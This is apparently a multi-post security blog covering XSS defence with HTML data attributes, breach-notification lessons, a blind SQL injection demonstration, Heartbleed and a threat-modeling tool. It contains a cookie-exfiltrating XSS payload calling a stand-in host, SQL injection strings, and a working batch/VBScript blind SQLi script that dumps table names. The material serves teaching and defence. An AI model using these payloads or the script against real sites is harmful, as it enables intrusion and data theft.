General Security

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag whose name begins with the word “data” and a hyphen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only three quoting rules to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;” (or “&#39;” for single quotes, if that is what you quoted the value with).

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
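Here is a minimal sketch of that “encode everything other than alphanumerics” approach. The function names are my own invention for illustration, not part of any library, and the sketch assumes the attribute name itself is chosen by the developer, never by the user.

```javascript
// Hypothetical helper: turn every non-alphanumeric character into a numeric
// character reference, so the value cannot close the attribute or start an entity.
function encodeForAttribute(value) {
  return Array.from(String(value), (ch) =>
    /^[A-Za-z0-9]$/.test(ch) ? ch : "&#x" + ch.codePointAt(0).toString(16) + ";"
  ).join("");
}

// Rule 1: always wrap the encoded value in double quotes.
// `name` is assumed to be a developer-chosen constant such as "search-term".
function dataAttribute(name, value) {
  return "data-" + name + '="' + encodeForAttribute(value) + '"';
}

// The search string used in the attack earlier in this post.
const attack = '"-window.open("//badpage.com/"+document.cookie,"_top")-"';
console.log("<div " + dataAttribute("search-term", attack) + "></div>");
```

The output contains no raw quote characters from the search string, so the value has nothing with which to escape from the attribute.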

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character, or at the “>” that closes the tag.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a “.data(…)” function which will fetch a data attribute’s value.
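As a rough sketch of the plain JavaScript route, the helper below wraps getElementById and getAttribute. The helper name and the stand-in document object are assumptions of mine, there only so the example runs outside a browser. In a real page you would pass the browser’s own document.

```javascript
// Sketch: read a data-* attribute as plain text. `doc` is any object that
// offers getElementById, such as the browser's `document`.
function readDataAttribute(doc, elementId, name) {
  const element = doc.getElementById(elementId);
  if (element === null) return null;            // no such element
  return element.getAttribute("data-" + name);  // a string, or null if absent
}

// Stand-in for the DOM (an assumption, so the sketch runs without a browser).
// The attribute value is what the browser holds after HTML-decoding once.
const fakeDocument = {
  getElementById: (id) =>
    id === "myDataDiv"
      ? { getAttribute: (n) => (n === "data-search-term" ? 'say "hi" & bye' : null) }
      : null,
};

console.log(readDataAttribute(fakeDocument, "myDataDiv", "search-term"));
```

In a browser, document.getElementById("myDataDiv").dataset.searchTerm reads the same attribute through the standard dataset property.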

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHTML and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.
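A small sketch of what that looks like in practice. One thing to bear in mind is that parseInt() stops quietly at the first character it can’t use, so “42;alert(1)” parses as 42. The parseWholeNumber helper below is a hypothetical stricter wrapper of my own, for when you want to reject such strings outright.

```javascript
// Hypothetical strict wrapper: accept only an optional sign followed by digits.
function parseWholeNumber(text) {
  const trimmed = String(text).trim();
  if (!/^[+-]?\d+$/.test(trimmed)) return NaN;
  return parseInt(trimmed, 10); // always pass the radix explicitly
}

console.log(parseInt("42", 10));              // a number, nothing is executed
console.log(parseFloat("3.5"));
console.log(parseInt("alert(1)", 10));        // NaN: the text is never run as code
console.log(parseInt("42;alert(1)", 10));     // 42: the trailing text is ignored
console.log(parseWholeNumber("42;alert(1)")); // NaN: the strict wrapper rejects it
```

Either way, the string is only ever treated as data, which is the whole point.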

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.

Lessons to learn already from Premera – 1. Notification

Last weekend, along with countless employees and ex-employees of Microsoft, Amazon, Expedia, and Premera itself, I received a breach notification signed by Premera’s President & CEO, Jeffrey Roe.

Here are a few things I think can already be learned from this letter and the available public information:

Don’t claim “sophisticated”

Whenever I see the phrase “sophisticated cyberattack”, not only am I turned off by the meaningless prefix “cyber”, which seems to serve only to “baffle them with bullshit”, but I’m also convinced that the author is trying to convince me that, hey, this attack was just too amazing and science-fictiony to do anything to stop.

All that does is push me in the other direction – to assume that the attack was relatively simple, and should have been prevented and/or noticed.

Granted, my experience is in Information Security, and so I’m always fairly convinced that it’ll be the simple attacks, not the complex and difficult ones, that will be the most successful against any site I’m trying to protect. It’s a little pessimistic, but it’s been proven right time and again.

So, never say that an attack is “sophisticated” unless you really mean that the attack was way beyond what could have been reasonably imagined. You don’t have to say the attackers used simple methods to get in because your team are idiots, because that’s unlikely to be entirely true, either. Just don’t make it sound like it’s not your fault. And don’t make that your opening gambit, either – this was the very first sentence in Premera’s notification.

Don’t say “may” / “might”, say “was”

“some of your personal information may have been accessed”

Again, this phrasing simply makes me think “these guys have no idea what was accessed”, which really doesn’t inspire confidence.

Instead, you should say “the attackers had access to all our information, including your personal and medical data”. Then acknowledge that you don’t have tracking on what information was exported, so you have to act as if it all was.

Say “sorry we allowed your data to be lost”

The worst apologies on record all contain some variation of “I’m sorry you’re upset”, or “I’m sorry you took offence”.

Premera’s version of this is “We … regret the concern it may cause”. So, not even “sorry”. And to the extent that it’s an apology at all, it is that we, current and past customers, were “concerned”.

Parenthetical abbreviations mean this was written by a lawyer

Premera Blue Cross (“Premera”) …

… Information Technology (IT) systems

As if the lack of apology didn’t already tip us off that this document was prepared by a lawyer, the parenthetical creation of abbreviations to be used later on makes it completely clear.

If the letter had sounded more human, it would have been easier to receive as something other than a legal arse-covering exercise.

Speed is important

The letter acknowledges that the issue was discovered on January 29, 2015, and the letter is dated March 17, 2015. That’s nearly two months. And nearly a year since the attackers got in. That’s assuming that you’ve truly figured out the extent of the “sophisticated cyberattack”.

Actually, that’s pretty fast for security breach disclosure, but it still gives the impression to customers that you aren’t letting them know in enough time to protect themselves.

The reason given for this delay is that Premera wanted to ensure that their systems were safe before letting other attackers know about the issue – but it’s generally a fallacy to assume that attackers don’t know about your vulnerabilities. Premera, and the health insurance industry, do a great job of sharing security information with other health insurance providers – but the attackers do an even better job of sharing information about vulnerable systems and tools.

Which leads us to…

Preparation is key

If your company doesn’t have a prepared breach disclosure letter, approved by public relations, the security team and your lawyers, it’s going to take you at least a week, probably two, to put one together. And you’ll have missed something, because you’re preparing it in a rush, in a panic, and in a haze while you’re angry and scared about having been attacked.

Your prepared letter won’t be complete, and won’t be entirely applicable to whatever breach finally comes along and bites you, but it’ll put you that much closer to being ready to handle and communicate that breach. You’ll still need to review it and argue between Security, Legal and PR teams.

Have a plan for this review process, and know the triggers that will start it. Maybe even test the process once in a while.

If you believe that breaches could require a credit notification or ID tracking protection, negotiate this ahead of time, so that this will not slow you down in your announcement. Or write your notification letter with the intent of providing this information at a later time.

Finally, because your notification letter will miss something, make sure it includes the ability to update your customers – link to an FAQ online that can be updated, and provide a call-in number for people to ask questions of an informed team of responders.

More to come

There’s always more information coming out about this breach, and I plan to blog a little more about it later.

Let me know in particular if there’s something you’d like me to cover on this topic.

I’m hacking your website with 15-year-old technology

But then, I’m hacking your website because of a 15-year-old flaw.

It’s been noted for some time that I love playing with XSS, simply because it’s so widespread, and because it’s an indication of the likely security stance of the rest of the website.

But while XSS is important because it’s so widespread, its impact is relatively low.

Slightly less widely spread, but often the cause of far greater damage, is SQL injection.

I’ll talk some more later about how SQL injection happens, but for now, here is a quick demonstration of the power of SQL injection.

What it isn’t – the login page

Every demonstration of SQL injection I’ve ever seen includes this example:

sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"

And of course, the trick here is to supply the user ID “admin” and the password “' OR 1='1”.

Sure, IF you have that code in your app, that will let the user in as admin.

But then, IF you have that code in your app, you have many bigger problems than SQL injection – because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.

More likely, if you have SQL injection in the logon code at all, is that you will have code like this:

sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
… execute sqlCommandString …
… extract salt …
… hash incoming password …
… compare salted hash of incoming password against stored password …

Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID “' OR userid LIKE '%” – but then the attacker would have to know the field was called userid, and they’re only going to get the first account in your database that has that password.

Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.
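For contrast, here is a hedged sketch of the same login flow done defensively, using Node.js and its built-in crypto module. The salt and password_hash column names, the “?” placeholder style and the helper names are all assumptions for illustration. Your database driver will have its own way of accepting the query text and the values separately.

```javascript
const crypto = require("crypto");

// Parameterised lookup: the SQL text is a constant, and the user ID travels
// separately as a value, so it can never become part of the command.
function userLookupQuery(inputID) {
  return {
    text: "SELECT userid, salt, password_hash FROM users WHERE userid = ?",
    values: [inputID],
  };
}

// Salted hash of the password, using scrypt from Node's standard library.
function hashPassword(password, salt) {
  return crypto.scryptSync(password, salt, 32);
}

// Compare the salted hash of the incoming password against the stored hash.
function passwordMatches(inputPass, row) {
  const candidate = hashPassword(inputPass, row.salt);
  return candidate.length === row.password_hash.length &&
    crypto.timingSafeEqual(candidate, row.password_hash);
}

// Demonstration with a made-up stored row.
const salt = crypto.randomBytes(16);
const storedRow = { userid: "alice", salt, password_hash: hashPassword("correct horse", salt) };

console.log(userLookupQuery("' OR userid LIKE '%")); // the text is unchanged by the input
console.log(passwordMatches("correct horse", storedRow));
console.log(passwordMatches("' OR 1='1", storedRow));
```

The injection strings from earlier simply become an unlikely user ID and a wrong password.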

So if not on the login page, where do we see SQLi?

Where do you use a SQL-like database?

Anywhere there’s a table of data to be queried, whether it’s a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.

Imagine I’ve got a dictionary searching page, weblexicon.example (that doesn’t exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.

If I give it a real word, it tells me the definition(s).

image

If I give it a non-existent word, it apologises for being unable to help me.

image

Seems like a database search is used here. Let’s see if it’s exploitable, by asking for “example'” – that’s “example” with an extra single quote at the end.

image

That’s pretty cool – we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word ‘example’ are in fact two single-quotes. A bit confusing, but it helps to understand what’s going on here.

So, let’s feed the web lexicon a value that might exploit it. Sadly, it doesn’t accept multiple commands, and gives the “You have an error in your SQL syntax” message when I try it.

Worse still, for some reason I can’t use the “UNION” or “JOIN” operators to get more data than I’m allowed. This seems to be relatively common when there are extra parentheses, or other things we haven’t quite guessed about the command.

I’m blind!

That means we’re stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesn’t? Let’s try that in a query to look up a true / false value:

image

image

So now, we can ask true / false questions against the database.

Seems rather limiting.

Let’s say we’re looking to see if the MySQL server is running a particular vulnerable version – we could ask for “example' and @@version='1.2.3.4” – a true response would give us the hint that we can exploit that vulnerability.

LIKE my ‘sploit

But the SQL language has so many other options. We can say “does your version number begin with a ‘4’”

image

Or 5.

image

A bit more exciting, but still pedestrian.

What if I want to find out what the currently executing statement looks like? I could ask “is it an ‘a’? a ‘b’? a ‘c’?” and so on, but that is too slow.

Instead, I could ask for each bit of the characters, and that’s certainly a good strategy – but the one I chose is to simply do a binary search, which is computationally equivalent.
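To see why a binary search is so much quicker than asking letter by letter, here is a small sketch that guesses one character code using only true / false answers. The isAtMost function is a local stand-in for a single yes-or-no question, and the range of 32 to 126 (printable ASCII) is my assumption. Nothing here talks to a database.

```javascript
// Find a character code in [low, high] using only true/false answers.
// `isAtMost(n)` answers the question "is the secret code <= n?".
function findCode(isAtMost, low = 32, high = 126) {
  let questions = 0;
  while (low < high) {
    const mid = Math.floor((low + high) / 2);
    questions += 1;
    if (isAtMost(mid)) {
      high = mid;      // the answer lies in the lower half
    } else {
      low = mid + 1;   // the answer lies in the upper half
    }
  }
  return { code: low, questions };
}

const secret = "w".charCodeAt(0);
const result = findCode((n) => secret <= n);
console.log(String.fromCharCode(result.code), "found in", result.questions, "questions");
```

With 95 possible characters, this never needs more than seven questions per character, against an average of dozens when guessing one letter at a time.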

What language, that’s the question…

A fifteen-year-old vulnerability (SQL injection is older than that, but I couldn’t do the maths) deserves the same age of language to write my attack in.

So I chose batch file and VBScript (OK, they’re both older than 15). Batch files can’t actually download a web page, so that’s the part I wrote in VBScript.

And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.

So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.

setlocal ENABLEDELAYEDEXPANSION
setlocal ENABLEEXTENSIONS
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
set last=
set stem=%last%
set lasti=0
set out=sqli.out
:looping
@set found=_
:looping2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
  set last2=%stem:\_=_%
  if "!last!" lss "!last2!" (
    set last=!last2!
    echo !last!
    set /a lasti=!lasti!+1
    set stem=
rem pause
    goto :looping
  )
  rem pause
  set stem=!stem:~0,-1!
  title %stem%.
  goto :looping2
)
@set nchars=1
@set nqueries=0
:charloop
@set lower=32
@set higher=127
:check
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
    set higher=%mid%
    set /a mid=%lower%-1
)
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem pause
@set stem=%stem%%found%
@rem echo . | set /p foo=%found: =+%
@title !stem!
@set /a nchars=%nchars%+1
@goto charloop
:donecheck
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@rem pause
@set /a lasti=!lasti!+1
@set stem=
@goto :looping

And the output (demonstrating that there are still some concurrency issues to take care of):

0: CHARACTER_SETS
1: COLLATIONS
2: COLLATION_CHARACTER_SET_APPLICABILITY
3: COLUMNS
4: COLUMN_PRIVILEGES
5: ENGINES
6: EVENTS
7: F
8: GLOBAL_SgATUS
9: GLOBAL_VARIABLES
10: KEY_COLUMN_USAGE
11: PARAMETERS
12: PARTITIONS
13: PLUGINS
14: PROCESSLIST
15: PROFILING
16: REFERENTIAL_CONSTRAINTS
17: ROUTINES
18: SCHEMATA
19: SCHEMA_PRIVILEGES
20: SESSION_STATUS
21: SESSION_VARIABLES
22: STATISTICS
23: TABLES
24: TABLESPACES
25: TABLE_CONSTRAINTS
26: TABLE_PRIVILEGES
27: TRIGGERS
28: USER_PRIVILEGES
29: VIEWS
30: INNODB_BUFFER_PAGE
31: INNODB_TRX
32: INNODB_BUFFER_POOL_S
33: INNODB_LOCK_WAITS
34: INNODB_CMPMEM
35: INNODB_CMP
36: INNODB_LOCKS
37: INNODB_CMPMEM_RESET
38: INNODB_CMP_RESET
39: INNODB_BUFFER_PAGE_
40: alternatives
41: quotes
42: words

60 lines? What, that’s it?

Yes, that’s all it takes.

If you’re a developer of a web app which uses a relational database back-end, take note – it’s exactly this easy to dump your database contents. A few changes to the batch file, and I’m dumping column names and types, then individual items from tables.

And that’s all assuming I’m stuck with a blind SQL injection.

The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. It’s made easier by the fact that I can also access the command I’m injecting into, by virtue of MySQL including that in a process table.

Note that if I’m attacking a different site with a different injection point, I need to make two changes to my batch script, and I’m away. Granted, this isn’t exactly sqlmap.py, but then again, sqlmap.py doesn’t always find or exploit all the vulns that you have available.

Summary

The takeaways today:

  1. SQLi is a high damage attack – an attacker can probably steal ALL your data from your databases, not just the data exposed on a page, and they may be able to modify ALL your data.
  2. SQLi is easy to find – there are lists of thousands of vulnerable websites available for anyone to view. And that’s without looking on the “Dark Web”. Also, any data-handling web site is a great target to try.
  3. SQLi is easy to exploit – a few lines of an archaic language are all it takes.
  4. SQLi is easy to fix. Parameterised queries, input validation, access control and least-privilege combine (don’t use just one!) to protect your site.
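
As a sketch of the first two items in that fix, here is how a dictionary lookup might combine input validation with a parameterised query. The definition column, the “?” placeholder style and the allow-list pattern are assumptions for illustration. The words table name is borrowed from the output above.

```javascript
// Allow-list: a letter, then up to 63 letters, apostrophes, spaces or hyphens.
const WORD_PATTERN = /^[A-Za-z][A-Za-z' -]{0,63}$/;

// Build a parameterised lookup. The word is validated first, and then still
// passed as a separate value rather than pasted into the SQL text.
function definitionQuery(word) {
  if (typeof word !== "string" || !WORD_PATTERN.test(word)) {
    throw new RangeError("not a plausible dictionary word");
  }
  return {
    text: "SELECT definition FROM words WHERE word = ?",
    values: [word],
  };
}

console.log(definitionQuery("o'clock"));
try {
  definitionQuery("example' and 1='1");
} catch (err) {
  console.log("rejected:", err.message);
}
```

Note that a legitimate word such as “o'clock” needs the apostrophe, so validation by itself cannot stop every injection. That is why the value is still passed as a parameter, and why the list says not to rely on just one defence.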

Disclaimer

The code in this article is for demonstration purposes – I’m not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your site’s data, but can be prevented by a small change.

Don’t use this code to do bad things. Don’t use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.

Heartbleed – musings while it’s still (nearly) topical

Hopefully, you’ll all know by now what Heartbleed is about. It’s not a virus, it’s a bug in a new feature that was added to a version of OpenSSL, wasn’t very well checked before making it part of the standard build, and which has for the last couple of years meant that any vulnerable system can have its running memory leached by an attacker who can connect to it. I have a number of angles on this which I haven’t seen elsewhere:

Behavioural Changes to Prevent “the next” Heartbleed

You know me, I’m all about the “defence against the dark arts” side of information security – it’s fun to attack systems, but it’s more interesting to be able to find ways to defend.

Here are some of my suggestions about programming practices that would help:

  1. Don’t adopt new features into established protocols without a clear need to do so. Why was enabling the Heartbeat extension a necessary thing to foist on everyone? Was it a MUST in the RFC? Heartbeat, “keep-alive” and similar measures are a waste of time on most of the Internet’s traffic, either because the application layer already keeps up a constant communication, or because it’s easy to recover and restart. Think very carefully before adopting as mandatory a new feature into a security related protocol.
  2. This was not a security coding bug, it was a secure coding bug, but in a critical piece of security code. Secure code practices in general should be a part of all developers’ training and process, much like hand-washing is important for doctors whether they’re performing surgery or checking your throat for swelling. In this case, the code submitted should have tripped a “this looks odd” sense in the reviewer, combined with its paucity of comments and self-explanation (but then, OpenSSL is by and large that way anyway).
  3. Check lengths of buffers. When data is structured, or wrapped in layers, like SSL records are, transform it back into structures and verify at each layer. I’m actually trying to say write object-oriented code to represent objects – whether the language is object-oriented or not. [It’s a matter of some pride for me that I reviewed some of the Fortran code I wrote as a student back in the mid eighties, and I can see object-orientedness trying to squeeze its way out.]
  4. Pay someone to review code. Make it their job, pay them well to cover the boredom, and hold them responsible for reviewing it properly. If it matters enough to be widely used, it matters enough to be supported.
  5. Stop using magic numbers. No “1 + 2 + 16” – use sizeof, even when it’s bleedin’ obvious.
  6. Unit tests. And then tests written by a QA guy, who’s trying to make it fail.
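
To illustrate items 3 and 5, here is a much-simplified sketch of a length check on an echo request, written for Node.js. The record layout (a two-byte length followed by the payload) is my simplification for illustration. It is not the real Heartbeat message format, and it is not OpenSSL’s code.

```javascript
// Named constant instead of a magic number.
const LENGTH_FIELD_BYTES = 2;

// Echo back the payload of a record, but only after checking that the length
// the sender claims actually fits inside the data the sender provided.
function echoPayload(record) {
  if (record.length < LENGTH_FIELD_BYTES) {
    throw new RangeError("record too short to hold a length field");
  }
  const claimed = record.readUInt16BE(0);
  const actual = record.length - LENGTH_FIELD_BYTES;
  if (claimed > actual) {
    throw new RangeError("claimed " + claimed + " bytes but only " + actual + " were sent");
  }
  // Copy out exactly the claimed bytes, and nothing beyond them.
  return Buffer.from(record.subarray(LENGTH_FIELD_BYTES, LENGTH_FIELD_BYTES + claimed));
}

const honest = Buffer.concat([Buffer.from([0x00, 0x06]), Buffer.from("abcdef")]);
const lying = Buffer.concat([Buffer.from([0x02, 0x58]), Buffer.from("abcdef")]); // claims 600

console.log(echoPayload(honest).toString());
try {
  echoPayload(lying);
} catch (err) {
  console.log("rejected:", err.message);
}
```

The check that was missing amounts to the single comparison between the claimed length and the actual length.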

Those are just a few ideas off the top of my head. It’s true that this was a HARD bug to find in automated code review, or even with manual code review (though item 2 above tells you that I think the code looked perverse enough for a reviewer to demand better, cleaner code that could at least be read).

National Security reaction – inappropriate!

Clearly, from the number of sites (in all countries) affected negatively by this flaw, from the massive hysteria that has resulted, as well as the significant thefts disclosed to date, this bug was a National Security issue.

So, how does the US government respond to the allegations going around that they had knowledge of this bug for a long time?

By denying the allegations? By asserting they have a mandate to protect?

No, by reminding us that they’ll protect US (and world) industries UNLESS there’s a benefit to spying in withholding and exploiting the bug.

There was even a quote in the New York Times saying:

“You are not going to see the Chinese give up on ‘zero days’ just because we do.”

No, you’re going to see “the Chinese” [we always have to have an identifiable bogeyman] give up on zero days when our response to finding them is to PATCH THEM, not hold them in reserve to exploit at our leisure.

Specifically, if we patch zero days when we find them, those weapons disappear from our adversaries’ arsenals.

If we hold on to zero days when we find them, those weapons are a part of our adversaries’ arsenals (because the bad guys share better than the good guys).

National Security officials should recognise that in cyberwar – which consists essentially of people sending postcards saying “please hit yourself” to one another, and then expressing satisfaction when the recipient does so – you win by defending far more than by attacking.

Many eyeballs review is surprisingly incomplete

It’s often been stated that “many eyeballs” review open source code, and as a result, the reviews are implicitly of better quality than those of closed source code.

Clearly, OpenSSL is an important and widely used piece of security software, and yet this change was, by all accounts, reviewed by three people before being published and widely deployed. Only one of those people works full time for OpenSSL, and another was the author of the feature in question.

There are not “many” eyeballs working on this review. Closed source will often substitute paid eyeballs for quantity of eyeballs, and as a result will often achieve better reviews.

Remember, it’s the quality of the review that counts, and not whether the source is closed or open.

Closed source that is thoroughly reviewed by experts is better than open source that’s barely reviewed at all.

Finally, in case you’re not yet tired of Heartbleed analogies

Yes, XKCD delivered perhaps the most widely used analogy.

But here’s the one I use to describe it to family members.

Imagine you’re manning a reception desk.

Calls come in, you write down messages, and you send them off.

At some point, you realise that this is a waste of paper, so you start writing your messages on a whiteboard.

Wiping the whole whiteboard for each message is a waste of effort, so you only wipe out enough space to write each incoming message.

Some messages are long, some are short.

One day, you are asked to read a message back to the person who leaves it, just after you wrote it.

And to make it easy, they tell you how long their message is.

If someone gave you a six letter message, and asked you to read all six hundred letters of it back to them, you’d be upset, because that’s not how many letters they gave you.

Computers aren’t so smart, they are just really fast idiots.

The computer doesn’t get surprised that you sent six characters and ask for six hundred back, so it reads off the entire whiteboard, containing bits and pieces of every message you’ve had sent through you.

And because most messages are small, and only some are large, there’s almost an entire message in each response.

Microsoft’s (new!) SDL Threat Modeling Tool 2014

Amid almost no fanfare whatsoever, Microsoft yesterday released a tool I’ve been begging them for over the last five or six years.

[It’s not unusual for me to be so persistently demanding, as I’ve found it’s often the only way to get what I want.]

As you’ve guessed from the title, this tool is the “SDL Threat Modeling Tool 2014”. Sexy name, indeed.

Don’t they already have one of those?

Well, yeah, kind of. There’s the TAM Threat Analysis & Modeling Tool, which is looking quite creaky with age now, and which I never found to be particularly usable (though some people have had success with it, so I’m not completely dismissive of it). Then there are the previous versions of the SDL Threat Modeling Tool.

These have had their uses – and certainly it’s noticeable that when I work with a team of developers, one of whom has worked at Microsoft, it’s encouraging to ask “show me your threat model” and have them turn around with something useful to dissect.

So what’s wrong with the current crop of TM tools?

In a word, Cost.

Threat modeling tools from vendors other than Microsoft are pretty pricey. If you’re a government or military contractor, they’re probably great and wonderful. Otherwise, you’ll probably draw your DFDs in PowerPoint (yes, that’s one of the easier DFD tools available to most of you!), and write your threat models in Word.

Unless, of course, you download and use the Microsoft SDL Threat Modeling Tool, which has always been free.

So where’s the cost?

The SDL TM tool itself was free, but it had a rather significant dependency.

Visio.

Visio is not cheap.

As a result, those of us who championed threat modeling at all in our enterprises found it remarkably difficult to get approval to use a free tool that depended on an expensive tool that nobody was going to use.

What’s changed today?

With the release of Microsoft SDL Threat Modeling Tool 2014, Microsoft has finally delivered a tool that allows for the creation of moderately complex DFDs (you don’t want more complex DFDs than that, anyway!), and a threat library-based analysis of those DFDs, without making it depend on anything more expensive or niche than Windows and .NET. [So, essentially, just Windows.]

Yes, that means no Visio required.

Is there anything else good about this new tool?

A quick bullet list of some of the features you’ll like, besides the lack of Visio requirement:

  • Imports from the previous SDL Threat Modeling Tool (version 3), so you don’t have to re-work your existing models
  • Multiple diagrams per model, for different levels of DFD
